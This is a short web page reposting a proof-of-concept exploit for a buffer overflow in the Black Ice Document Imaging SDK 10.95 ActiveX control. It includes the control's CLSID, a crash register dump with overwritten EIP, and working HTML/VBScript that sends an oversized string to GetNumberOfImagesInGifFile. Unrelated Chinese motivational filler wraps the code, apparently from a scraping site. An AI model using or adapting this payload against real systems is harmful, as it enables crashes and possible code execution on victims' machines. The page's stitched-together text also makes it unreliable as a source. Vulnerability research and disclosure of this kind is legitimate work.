Document Imaging SDK 10.95 ActiveX Buffer Overflow PoC

今天我们所做的一切挣扎都是在为明天积蓄力量,所以别放弃。因为无能为力,所以顺其自然。因为心无所恃,所以随遇而安。没有离不开,只有不想离开;没有舍不得,只有放不下。
<!--
Document Imaging SDK Buffer Overflow Vulnerability

DoS Proof of concept

Author: r0ut3r
Mail : writ3r [at] gmail.com
-----------------------------
-Tested on WinXP Pro SP2

Version: 10.95


Vendor : Black Ice Software

Price : $999

File : biimgfrm.ocx
CLSID: {79956462-F148-497F-B247-DF35A095F80B}

DLL Settings:
RegKey Safe for Script: True
RegKey Safe for Init : True
KillBitSet : False

Register:



EIP 7C91B3FB -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EAX 001919C0 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBX 41414141
ECX 00004141
EDX 00150168 -> 00000000
EDI 41414141



ESI 001919B8 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP 0013EA20 -> 0013EAA4
ESP 0013E804 -> 0000021A
-----------------------------
-->
<object classid='clsid:79956462-F148-497F-B247-DF35A095F80B' id='test'></object>



<script language='vbscript'>
Sub Boom
buff = String(14356, "A")
test.GetNumberOfImagesInGifFile buff

End Sub
</script>
<input type=button onclick=Boom() value='Boom?'>

到此这篇关于Document Imaging SDK 10.95 ActiveX Buffer Overflow PoC 就介绍到这了。别遇到一点鸡毛蒜皮的事情就一蹶不振,你才多岁,怕什么困难无穷。更多相关Document Imaging SDK 10.95 ActiveX Buffer Overflow PoC 内容请查看相关栏目,小编编辑不易,再次感谢大家的支持!